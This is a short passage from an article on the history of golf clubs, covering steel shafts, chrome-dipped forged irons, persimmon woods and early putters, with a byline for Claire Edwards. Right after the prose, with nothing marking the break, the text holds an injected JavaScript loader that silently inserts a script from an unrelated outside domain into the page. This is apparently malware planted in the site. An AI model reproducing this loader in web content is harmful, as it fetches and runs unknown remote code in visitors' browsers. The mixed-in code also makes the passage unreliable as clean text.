Minus the invention of the steel shaft in the 1930s, golf clubs had barely changed in decades. Irons were forged of steel. They were muscle-backed and dipped in chrome, and woods were an inconsistently milled teardrop of persimmon wood glued to the bottom of a shaft. The most popular putters of the day resembled a smaller version of their iron cousins, lower profile with less loft.;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’);
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Irons in the Fire
by Claire Edwards